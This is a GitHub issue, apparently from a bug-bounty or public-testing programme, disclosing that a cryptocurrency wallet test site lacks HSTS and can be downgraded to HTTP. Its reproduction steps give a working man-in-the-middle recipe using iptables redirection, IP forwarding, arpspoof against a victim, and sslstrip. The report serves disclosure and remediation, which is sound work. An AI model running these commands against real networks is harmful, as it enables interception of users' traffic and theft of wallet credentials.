[Community Bug] + Wallet is Vulnerable to MiTM #53
Comments
ngpentest007
changed the title
|
cool, we will fix it. Reference link to get more about HTTPS: |
|
Great. Thank you. |
|
@everyone Thanks |
|
Dear ngpentest007, Thank you for participating in aelf Enterprise 0.8.0 Beta version public testing. Contact Information: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Vulnerability: Wallet is Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the wallet is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted wallet by forcing the wallet to load without utilizing SSL/TLS.
Vulnerable Application: Wallet https://wallet-test.aelf.io
Severity: High
Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpsoof is running. Now in a separate terminal window type the following command: sslstrip -l 8080
5- When the victim tries to access wallet-test.aelf.io it will load over HTTP.
Or
check the HSTS Presence in the response header.
Impact: An attacker can force the wallet to utilize HTTP. Once the wallet is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
1- Enable HSTS
2- Enable HTTPS throughout the website
Screenshot: Shows wallet is NOW accessible over HTTP
Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
The text was updated successfully, but these errors were encountered: